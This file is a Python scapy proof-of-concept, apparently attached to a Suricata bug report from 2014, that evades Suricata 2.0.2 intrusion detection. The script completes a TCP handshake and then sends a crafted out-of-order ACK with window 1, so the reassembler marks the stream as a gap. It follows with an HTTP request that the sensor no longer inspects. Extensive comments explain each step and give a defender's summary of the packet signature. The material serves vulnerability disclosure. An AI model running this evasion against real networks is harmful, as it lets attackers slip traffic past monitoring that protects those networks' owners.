Bug #1238 » deseq_ACK.py

Clean one - JmpCallPoo ., 07/16/2014 09:30 AM

 
#!/usr/bin/python
#16-07-2014
#@JmpCallPoo
#
# Proof-of-concept attached to Suricata bug #1238. One out-of-order ACK sent
# right after the handshake makes the Suricata 2.0.2 stream reassembler (the
# check quoted below) mark the TCP stream as a data gap
# (STREAMTCP_STREAM_FLAG_GAP) and stop inspecting it, while, per the author's
# note, the endpoint's TCP stack carries on as if nothing happened.
#
# The script is a single linear exchange with dst_ip: each sr1() call sends
# one packet and blocks for at most one reply. It needs scapy and raw-socket
# privileges, and it has no error handling (see the note at the SYN step).
#
# Defender's summary: the distinguishing property of the "evil" segment is an
# acknowledgement number ahead of anything the peer has sent (ack = peer
# ISN + 3 while only ISN + 1 is legitimate at that point), paired with
# window=1. Whether a deployed Suricata still carries the quoted check should
# be verified against the bug report this file is attached to.

# Star import: brings IP, TCP and sr1 into scope, along with a large number
# of other scapy names.
from scapy.all import *

#Possible evasion :
#
#stream-tcp-reassemble.c@2911 (Suricata 2.0.2)
#
#/* Check if we have a gap at the start of the list. If last_ack is
#* bigger than the list start and the list start is bigger than
#* next_seq, we know we are missing data that has been ack'd. That
#* won't get retransmitted, so it's a data gap.
#*/
#if (SEQ_GT(seg->seq, next_seq) && SEQ_LT(seg->seq, stream->last_ack)) {
# ...
# stream->flags |= STREAMTCP_STREAM_FLAG_GAP; //Never process this stream again...
# ...
#}

# Peer of the exchange. '1.2.3.4' is a placeholder left by the author; the
# rest of the script assumes a host answering on TCP/80.
dst_ip = '1.2.3.4'

# Step 1: SYN with a fixed, arbitrary ISN. sport is not set, so the SYN
# leaves with scapy's default source port. sr1() returns the first answer,
# or None when nothing arrives within the 1 s timeout (retry=0); a None here
# makes every syn_ack[TCP] subscript below raise, so the script only gets
# past this point when a SYN/ACK really comes back.
syn = IP(dst=dst_ip) / TCP(dport=80, seq=123456, flags='S')
syn_ack = sr1(syn, retry=0, timeout=1)

# Step 2: third handshake segment. sport is copied from the SYN/ACK's dport
# so it matches whatever port the SYN went out with; seq is the peer's ack
# (our ISN + 1) and ack is the peer's ISN + 1.
ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4096)
sr1(ack, retry=0, timeout=1)

# Step 3: the evasion segment.
#This is the evil packet, this packet flags the TCP stream as STREAMTCP_STREAM_FLAG_GAP (Data Gap) in suricata, but doesn't impact a normal TCP stack
#Set window size to 1, and ACK a non-existent packet.
#Working at least on Linux 3.2 and Windows XP
# Same seq as the handshake ACK, but ack = peer ISN + 3, i.e. two bytes past
# the only sequence number the peer has consumed so far (its SYN). Per the
# Suricata snippet above, that leaves last_ack ahead of next_seq, which the
# reassembler treats as a gap that will never be retransmitted.
fake_ack = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+3, flags='A', window=1)
sr1(fake_ack, retry=0, timeout=1)

# Step 4: the request the IDS is expected to miss, carried on a segment with
# the legitimate ack (peer ISN + 1) again. Two things to be aware of:
#  - the request line has no HTTP version ("GET /" followed directly by the
#    Host header); whether a server accepts that form is server-dependent.
#  - window=4069 differs from the 4096 used everywhere else; this looks like
#    a transposition, and nothing in the PoC appears to depend on it.
# `reply` is assigned but not used afterwards.
getStr = 'GET /\r\nHost: '+dst_ip+'\r\n\r\n';
request = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack, ack=syn_ack[TCP].seq+1, flags='A', window=4069) / getStr
reply = sr1(request, retry=0, timeout=2)

# Step 5: teardown. The +29 / +329 offsets are specific to the author's own
# run: 29 presumably equals len(getStr) for the author's original dst_ip
# (with '1.2.3.4' the request is 24 bytes), and 329 presumably the size of
# the server's reply. As the author notes, this segment is irrelevant to the
# PoC itself.
#Will not work for you, set the correct seq incrementation, but this packet isn't important !
fin = IP(dst=dst_ip) / TCP(dport=80, sport=syn_ack[TCP].dport, seq=syn_ack[TCP].ack+29, ack=syn_ack[TCP].seq+329, flags='FA', window=4096)
sr1(fin, retry=0, timeout=1)